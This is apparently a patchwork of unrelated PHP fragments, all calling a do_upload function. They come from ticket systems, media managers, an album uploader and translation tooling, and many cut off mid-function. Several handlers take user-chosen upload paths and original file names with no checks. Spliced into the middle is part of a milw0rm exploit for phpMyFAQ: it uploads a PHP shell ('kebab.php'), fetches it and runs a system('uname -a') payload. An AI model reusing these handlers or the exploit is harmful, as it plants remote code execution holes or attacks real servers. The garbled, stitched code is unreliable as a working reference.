function content()
{
if (!user_logged_in()) {
return must_log_in();
}
$errors = array();
if (array_key_exists('upload', $_POST)) {
if (!array_key_exists('file', $_FILES) || filesize($_FILES['file']['tmp_name']) == 0) {
$errors[] = 'Please supply a file';
}
if (count($errors) == 0) {
preg_match('/\\.([^\\/.]+)$/', $_FILES['file']['name'], $matches);
$file_id = do_upload($_FILES['file']['tmp_name'], $_FILES['file']['type'], $matches[1], $_FILES['file']['size']);
page_header('File uploaded');
?>
<?php
return;
}
}
page_header('Upload file');
show_error_list($errors);
?>
<form enctype="multipart/form-data" action="" method="post">
<div class="fieldrow">
<div>
<label for="file">Select an image
<span class="label-extra">(size limit: 8MB)</span></label>
<input id="file" name="file" type="file" />
</div>
</div>
<div class="fieldrow">
<input type="submit" name="upload" value="Upload" />
</div>
</form>
<?php
}
$query = squery("SELECT t.id,t.randcode,t.status,t.title,t.description,t.unick,t.ufullname,t.uemail,t.uphone,t.uip,t.rep_u,\nt.rep_g,t.open_time,t.opened_by,t.is_real,t.is_private,t.email_upd,t.memo_upd,c1.name AS cat1_name,c2.name AS cat2_name,c3.name AS \ncat3_name,s.status_name,up.priority_name AS upriority,sp.priority_name AS priority,c3.extra,t.ext1,t.ext2,t.ext3,t.merged_to,t.cc,\ng.private_actions,t.lastupd_time \nFROM (karnaf_tickets AS t INNER JOIN karnaf_cat3 AS c3 ON c3.id=t.cat3_id INNER JOIN karnaf_cat2 AS c2 ON c2.id=c3.parent \nINNER JOIN karnaf_cat1 AS c1 ON c1.id=c2.parent INNER JOIN karnaf_statuses AS s ON s.status_id=t.status INNER JOIN karnaf_priorities AS up ON \nup.priority_id=t.upriority INNER JOIN karnaf_priorities AS sp ON sp.priority_id=t.priority LEFT JOIN groups AS g ON g.name=t.rep_g) WHERE t.id=%d", $id);
if ($result = sql_fetch_array($query)) {
if (!$isoper && $randcode != $result['randcode'] && ($nick != $result['unick'] || $nick == "Guest" || $a_regtime > (int) $result['open_time'])) {
AccessDenied("You must provide the ticket verification code to view this page.");
}
if (isset($_POST['reply_text']) && !empty($_POST['reply_text']) && $result['status'] != 0) {
squery("INSERT INTO karnaf_replies(tid,reply,r_by,r_time,r_from,ip) VALUES(%d,'%s','%s',%d,'%s','%s')", $id, $_POST['reply_text'], $nick, time(), $nick, get_session_ip());
if ((int) $result['status'] == 2) {
squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id);
send_memo($result['rep_u'], "User has replied to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']);
}
echo "<div class=\"status\">Your reply has been saved.</div><br>";
$result['status'] = 1;
}
if (isset($_FILES['attachment-file']['name']) && !empty($_FILES['attachment-file']['name'])) {
$error = do_upload($id);
if ($error == "") {
if ((int) $result['status'] == 2) {
squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id);
send_memo($result['rep_u'], "User has added an attachment to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']);
}
echo "<div class=\"status\">Your attachment has been saved.</div><br>";
} else {
echo "<div class=\"status_err\">Error: " . $error . "</div><br>";
}
}
if ($isoper) {
if (IsGroupMember($result['rep_g']) || IsKarnafAdminSession()) {
$isadmin = 1;
}
if ($result['is_private'] && !$isadmin) {
} else {
if ($_FILES['Filedata']) {
$resource = fopen("log.txt", "a");
fwrite($resource, date("Ymd h:i:s") . "UPLOAD - {$_SERVER['REMOTE_ADDR']}" . $_FILES['Filedata']['name'] . " " . $_FILES['Filedata']['type'] . "\n");
fclose($resource);
$file_type = $_FILES['Filedata']['type'];
$file_name = $_FILES['Filedata']['name'];
$file_ext = strtolower(substr($file_name, strrpos($file_name, ".")));
//File Size Check
if ($_FILES['Filedata']['size'] > $MAX_SIZE) {
$message = "The file size is over 2MB.";
} else {
if (!in_array($file_type, $FILE_MIMES) && !in_array($file_ext, $FILE_EXTS)) {
$message = "Sorry, {$file_name}({$file_type}) is not allowed to be uploaded.";
} else {
$message = do_upload($upload_dir, $upload_url);
}
}
print "<script>window.location.href='{$url_this}?message={$message}'</script>";
} else {
if (!$_FILES['Filedata']) {
} else {
$message = "Invalid File Specified.";
}
}
}
/************************************************************
* List Files
************************************************************/
$handle = opendir($upload_dir);
$filelist = "";
if (isset($_GET['delFolder']) && isset($_GET['dir'])) {
delete_folder($_GET['delFolder']);
}
if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) {
$dirPathPost = $_POST['dirPath'];
if (strlen($dirPathPost) > 0) {
if (substr($dirPathPost, 0, 1) == '/') {
$FILE_ROOT .= $dirPathPost;
} else {
$FILE_ROOT = $dirPathPost;
}
}
if (strrpos($FILE_ROOT, '/') != strlen($FILE_ROOT) - 1) {
$FILE_ROOT .= '/';
}
do_upload($_FILES['upload'], $BASE_DIR . $BASE_ROOT . $dirPathPost . '/');
}
function do_upload($file, $dest_dir)
{
global $clearUploads;
if (is_file($file['tmp_name'])) {
//var_dump($file); echo "DIR:$dest_dir";
move_uploaded_file($file['tmp_name'], $dest_dir . $file['name']);
}
$clearUploads = true;
}
function delete_folder($folder)
{
global $BASE_DIR, $refresh_dirs;
//var_dump($BASE_DIR);
$del_folder = dir_name($BASE_DIR) . $folder;
echo "=> Uploading file.\n";
$result = curl_exec($ch);
curl_close($ch);
@unlink("kebab.php");
$get = $baseurl . "/attachments/1337/kebab.php\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $get);
curl_setopt($ch, CURLOPT_PROXY, $proxy);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
if (strstr($result, "Un1q")) {
echo substr($result, 4);
} else {
echo "Not vulnerable / error ?\n";
}
curl_close($ch);
}
if ($argc < 3) {
printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
exit(0);
}
if ($argc == 4) {
$proxy = $argv[3];
} else {
$proxy = "";
}
do_upload($argv[1], $proxy, $argv[2]);
?>
# milw0rm.com [2007-03-01]
}
}
// action defaults to 'showdir'
if (is_null($action)) {
$action = 'showdir';
}
}
switch ($action) {
case 'showdir':
do_showdir();
break;
case 'showupload':
do_showupload();
break;
case 'upload':
do_upload();
break;
case 'showmkdir':
do_showmkdir();
break;
case 'mkdir':
do_mkdir();
break;
case 'showrename':
do_showrename();
break;
case 'rename':
do_rename();
break;
case 'showmove':
do_showmove();
if ($upload_album_cover == 'no') {
$show_audio_done = 1;
$show_image_done = 0;
$album_image_message = $config['album_image_message'];
$template = "themes/{$user_theme}/templates/main_1.htm";
$inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm";
$TBS = new clsTinyButStrong();
$TBS->NoErr = true;
$TBS->LoadTemplate("{$template}");
$TBS->Render = TBS_OUTPUT;
$TBS->Show();
@mysql_close();
die;
} else {
if ($_FILES['userfile']) {
$album_cover_change = do_upload($upload_dir);
$album_image_message = $album_cover_change[0];
$album_new_pic = $album_cover_change[1];
$upload_proceed = $album_cover_change[2];
}
}
if ($upload_proceed == true) {
// update audio_albums table album cover image
$sql_image = "UPDATE audio_albums SET album_picture = '{$album_new_pic}' WHERE album_id = '{$album_id}'";
$query_image = @mysql_query($sql_image);
$show_image_done = 1;
$album_image_message = $config['album_image_message'];
$template = "themes/{$user_theme}/templates/main_1.htm";
$inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm";
$TBS = new clsTinyButStrong();
$TBS->NoErr = true;
function upload()
{
global $mosConfig_absolute_path;
if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) {
$dirPathPost = $_POST['dirPath'];
if (strlen($dirPathPost) > 0) {
if (substr($dirPathPost, 0, 1) == '/') {
$IMG_ROOT .= $dirPathPost;
} else {
$IMG_ROOT = $dirPathPost;
}
}
if (strrpos($IMG_ROOT, '/') != strlen($IMG_ROOT) - 1) {
$IMG_ROOT .= '/';
}
do_upload($_FILES['upload'], $mosConfig_absolute_path . '/images/stories/' . $dirPathPost . '/');
}
}
$name = trim($name, ": ");
if (in_array($name, $grab)) {
$auth[$name] = trim($parts[1]);
}
}
return $auth;
}
$auth = do_auth();
printf(" \n **** parsed auth headers for PUT **** \n");
print_r($auth);
$ch2 = curl_init();
// get all files in css dir
$files = array();
// load everything from local css folder into
// <storage-url>/asset/css/local-file-path
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator('css')) as $path) {
$filename = sprintf("%s", $path);
$pos = strrpos($filename, "/");
if ($pos !== false) {
$last = substr($filename, $pos + 1);
if ($last == '.' || $last == '..') {
printf(" ignore file :: %s \n", $filename);
} else {
array_push($files, $filename);
}
}
}
foreach ($files as $file) {
do_upload($ch2, $auth, $file);
}
curl_close($ch2);
function upload()
{
josSpoofCheck();
if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) {
$dirPathPost = $_POST['dirPath'];
$file = $_FILES['upload'];
if (strlen($dirPathPost) > 0) {
if (substr($dirPathPost, 0, 1) == '/') {
$IMG_ROOT .= $dirPathPost;
} else {
$IMG_ROOT = $dirPathPost;
}
}
if (strrpos($IMG_ROOT, '/') != strlen($IMG_ROOT) - 1) {
$IMG_ROOT .= '/';
}
do_upload($file, COM_MEDIA_BASE . $dirPathPost . '/');
}
}
private function get_info_product($user)
{
$image = do_upload();
$product_info = array('name' => $this->input->post('name'), 'area_id' => $this->input->post('area'), 'category_id' => $this->input->post('category'), 'feild_id' => $this->input->post('feild'), 'created_date' => date('Y-m-d', time()), 'end_date' => $this->input->post('enddate'), 'content' => $this->input->post('content'), 'user_id' => $user['id'], 'image' => rand(1, 50) . '', 'active' => 0);
return $product_info;
}
function get_auth()
{
global $filepath;
if (USERNAME == 'free' && PASSWORD == 'free') {
$command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" ' . CURL_STARTURL;
} else {
$command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" -F "login='******'" -F "password='******'" ' . CURL_STARTURL;
}
$xml = exec($command, $out);
$str = implode("\n", $out);
$xml = xml2array($str);
if (!array_key_exists('Data', $xml)) {
print_log('Cannot retrieve XML data. Exit.', 'get_auth', 0, true);
}
if (empty($xml['Data']['ServerURL']) || empty($xml['Data']['MaxUploadFilesize'])) {
print_log('Important XML value is empty.', 'get_auth', 0, false);
print_log('Uploading aborted. Exit.', 'get_auth', 0, true);
}
$xml_error = $xml['Data']['Error'];
$xml_sessid = $xml['Data']['SessionID'];
$xml_server = $xml['Data']['ServerURL'];
$xml_maxsize = $xml['Data']['MaxUploadFilesize'];
print_log('---------------------------------------------------------------------------', 'get_auth', 1, false);
print_log('ServerURL : ' . $xml_server, 'get_auth', 1, false);
print_log('SessionID : ' . $xml_sessid, 'get_auth', 1, false);
print_log('MaxSize : ' . $xml_maxsize . ' MB', 'get_auth', 1, false);
print_log('---------------------------------------------------------------------------', 'get_auth', 1, false);
if (empty($xml_error)) {
if (empty($xml_sessid)) {
print_log('Uploading with free user account.', 'get_auth', 1, false);
do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize);
} else {
print_log('Uploading with registered user account.', 'get_auth', 1, false);
do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize, false);
}
} else {
if ($xml_error == 'auth_error') {
print_log('Username/password invalid. Exit.', 'get_auth', 0, true);
}
}
}
exec("{$xgettext_executable} `find -name \"*.php\" -o -name \"*.inc\"` -p {$dyn_locales_dir}/ -o messages.pot --keyword=_ -L PHP --add-comments=TRANSLATORS 2>&1", $exec_out, $ret_var);
if ($ret_var) {
echo "<center>" . _("Strings <b>not</b> rebuilt!") . "</center><br>" . _("This is the <code>xgettext</code> output:") . "<br><br>";
echo "<pre>";
foreach ($exec_out as $v) {
echo html_safe($v) . "\n";
}
echo "</pre><br>";
} else {
echo "<p>" . _("<code>xgettext</code> ran successfully.") . "</p>";
}
echo "<p><a href='{$translate_url}'>" . _("Back to the Translation Center") . "</a></p>";
} else {
if ($func == "upload") {
$locale = validate_locale($_REQUEST['locale']);
do_upload($locale);
echo "<p><a href='{$translate_url}?func=manage&locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>";
} else {
if ($func == "merge") {
$locale = validate_locale($_REQUEST['locale']);
$fuzzy = @$_REQUEST['fuzzy'];
do_merge($locale, $fuzzy);
echo "<p><a href='{$translate_url}?func=manage&locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>";
} else {
if ($func == "manage") {
$locale = validate_locale($_REQUEST['locale']);
manage_form($locale);
}
}
}
}
